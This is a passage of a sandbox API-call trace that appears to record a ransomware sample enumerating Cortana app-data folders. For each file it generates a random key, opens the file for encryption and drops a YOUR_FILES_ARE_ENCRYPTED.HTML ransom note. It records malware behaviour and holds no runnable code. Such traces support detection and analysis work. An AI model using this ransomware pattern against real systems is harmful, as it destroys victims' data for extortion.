[0119.322] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.324] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="F2") returned 2 [0119.324] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="5C") returned 2 [0119.324] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="E7") returned 2 [0119.324] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="CF") returned 2 [0119.324] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="9E") returned 2 [0119.324] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="05") returned 2 [0119.324] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="49") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="8E") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="61") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="2E") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="AB") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="09") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="7C") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="76") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="5C") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="D6") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="36") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="AA") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="94") returned 2 [0119.325] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="D8") returned 2 [0119.325] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="A1") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="DD") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="02") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="62") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="D6") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="7A") returned 2 [0119.325] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="77") returned 2 [0119.325] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="CB") returned 2 [0119.325] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="01") returned 2 [0119.325] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="5F") returned 2 [0119.325] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="F8") returned 2 [0119.325] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="75") returned 2 [0119.326] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132632415053778717.txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132632415053778717.txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132632415053778717.txt" [0119.326] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.326] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.329] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90fc5c0d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x91eac711, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x91f45223, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x36a28, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="SettingsCache.txt", cAlternateFileName="SETTIN~1.TXT")) returned 1 [0119.329] StrStrIW (lpFirst="SettingsCache.txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.329] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt") returned 135 [0119.330] PathFindExtensionW (pszPath="SettingsCache.txt") returned=".txt" [0119.330] lstrlenW (lpString=".txt") returned 4 [0119.330] PathFindExtensionW (pszPath="SettingsCache.txt") returned=".txt" [0119.330] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\settingscache.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0119.330] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=223784) returned 1 [0119.330] GetProcessHeap () returned 0x600000 [0119.330] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.331] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="22") returned 2 [0119.331] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="B3") returned 2 [0119.331] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="F1") returned 2 [0119.331] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="D5") returned 2 [0119.331] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="10") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="1F") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="89") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="BE") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="0B") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="CE") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="00") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="1C") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="4F") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="73") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="51") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="90") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="D2") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="11") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="E3") returned 2 [0119.331] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="15") returned 2 [0119.331] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="E1") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="76") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="5F") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="E0") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="E0") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="4F") returned 2 [0119.331] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="A0") returned 2 [0119.331] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="1A") returned 2 [0119.331] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="31") returned 2 [0119.331] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="64") returned 2 [0119.332] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="DE") returned 2 [0119.332] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="05") returned 2 [0119.332] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt" [0119.332] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.332] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.332] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90fc5c0d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x91eac711, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x91f45223, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x36a28, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="SettingsCache.txt", cAlternateFileName="SETTIN~1.TXT")) returned 0 [0119.332] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.332] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0119.332] GetProcessHeap () returned 0x600000 [0119.333] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.338] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.339] CloseHandle (hObject=0x320) returned 1 [0119.339] GetProcessHeap () returned 0x600000 [0119.339] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.339] GetProcessHeap () returned 0x600000 [0119.339] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.340] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98b617a5, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6728b39c, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x6728b39c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="speech_onecorereg.bin", cAlternateFileName="SPEECH~1.BIN")) returned 1 [0119.340] StrStrIW (lpFirst="speech_onecorereg.bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.340] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin") returned 121 [0119.340] PathFindExtensionW (pszPath="speech_onecorereg.bin") returned=".bin" [0119.340] lstrlenW (lpString=".bin") returned 4 [0119.340] PathFindExtensionW (pszPath="speech_onecorereg.bin") returned=".bin" [0119.340] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0119.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\speech_onecorereg.bin"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0119.341] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0119.341] GetProcessHeap () returned 0x600000 [0119.341] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.343] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="7B") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="9A") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="DA") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="68") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="4D") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="72") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="40") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="AB") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="10") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="4F") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="FC") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="E6") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="21") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="9B") returned 2 [0119.343] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="15") returned 2 [0119.344] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="5C") returned 2 [0119.344] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="AF") returned 2 [0119.344] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="E5") returned 2 [0119.344] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="02") returned 2 [0119.344] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="8B") returned 2 [0119.344] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="C5") returned 2 [0119.344] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="CE") returned 2 [0119.344] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="4E") returned 2 [0119.344] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="6B") returned 2 [0119.344] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="C4") returned 2 [0119.344] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="34") returned 2 [0119.344] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="16") returned 2 [0119.344] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="D8") returned 2 [0119.344] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="24") returned 2 [0119.344] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="35") returned 2 [0119.344] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="9C") returned 2 [0119.344] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="17") returned 2 [0119.344] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin" [0119.344] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.344] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.348] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x98b617a5, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x98b617a5, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x98b617a5, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="speech_onecorereg.bin.LOG1", cAlternateFileName="SPEECH~1.LOG")) returned 1 [0119.348] StrStrIW (lpFirst="speech_onecorereg.bin.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.348] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG1") returned 126 [0119.348] PathFindExtensionW (pszPath="speech_onecorereg.bin.LOG1") returned=".LOG1" [0119.348] lstrlenW (lpString=".LOG1") returned 5 [0119.348] PathFindExtensionW (pszPath="speech_onecorereg.bin.LOG1") returned=".LOG1" [0119.348] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x98b617a5, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x98b617a5, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x98b617a5, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="speech_onecorereg.bin.LOG2", cAlternateFileName="SPEECH~2.LOG")) returned 1 [0119.348] StrStrIW (lpFirst="speech_onecorereg.bin.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.348] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG2") returned 126 [0119.348] PathFindExtensionW (pszPath="speech_onecorereg.bin.LOG2") returned=".LOG2" [0119.348] lstrlenW (lpString=".LOG2") returned 5 [0119.348] PathFindExtensionW (pszPath="speech_onecorereg.bin.LOG2") returned=".LOG2" [0119.348] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x98b617a5, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x98b617a5, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x98b617a5, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="speech_onecorereg.bin.LOG2", cAlternateFileName="SPEECH~2.LOG")) returned 0 [0119.348] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0119.348] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0119.348] GetProcessHeap () returned 0x600000 [0119.348] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.349] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.350] CloseHandle (hObject=0x214) returned 1 [0119.350] GetProcessHeap () returned 0x600000 [0119.350] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.350] GetProcessHeap () returned 0x600000 [0119.350] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.350] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x607a6a92, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x607a6a92, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x607a6a92, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="MICROS~1.52_")) returned 1 [0119.351] StrStrIW (lpFirst="Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.351] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy") returned 153 [0119.351] GetProcessHeap () returned 0x600000 [0119.351] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.351] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy" [0119.351] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\*" [0119.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x607a6a92, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x607a6a92, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x607a6a92, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.351] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x607a6a92, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x607a6a92, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x607a6a92, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 1 [0119.351] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x607a6a92, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x607ccd2e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x607ccd2e, ftLastWriteTime.dwHighDateTime=0x1d70068, 